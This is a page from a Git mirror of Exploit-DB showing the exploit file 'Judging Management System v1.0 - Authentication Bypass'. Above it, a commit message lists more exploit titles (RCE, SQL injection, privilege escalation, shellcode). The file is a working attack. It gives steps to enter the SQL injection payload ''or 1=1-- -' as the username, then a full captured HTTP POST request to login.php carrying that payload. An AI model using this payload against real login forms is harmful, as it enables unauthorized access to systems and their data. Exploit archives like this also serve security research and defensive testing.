bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51165.txt
Exploit-DB 9b56e8731e DB: 2023-04-01 
25 changes to exploits/shellcodes/ghdb

EQ Enterprise management system v2.2.0 - SQL Injection

qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)

ASKEY RTF3505VW-N1 - Privilege Escalation

Bangresto 1.0 - SQL Injection

Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)

Cacti v1.2.22 - Remote Command Execution (RCE)
Judging Management System v1.0 - Authentication Bypass
Judging Management System v1.0 - Remote Code Execution (RCE)

rconfig 3.9.7 - Sql Injection (Authenticated)

Senayan Library Management System v9.0.0 - SQL Injection

Spitfire CMS 1.0.475 - PHP Object Injection

Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)

WooCommerce v7.1.0 - Remote Code Execution(RCE)

CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  -  Denial Of Service (DoS)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x  - Authorization Bypass (IDOR)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset
SOUND4 Server Service 4.1.102 - Local Privilege Escalation

macOS/x64 - Execve Null-Free Shellcode
2023-04-01 00:16:31 +00:00

36 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Judging Management System v1.0 - Authentication Bypass
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server
# Vulnerability: An attacker can bypass login page and access to dashboard page
# Vulnerable file: login.php
# Exploit:
1) Go to: http://localhost/php-jms/index.php
2) As username use this payload: 'or 1=1-- -
3) Use random words for password
POST /php-jms/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/php-jms/index.php
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
username=%27or+1%3D1--+-&password=asa
Reference in a new issue View git blame Copy permalink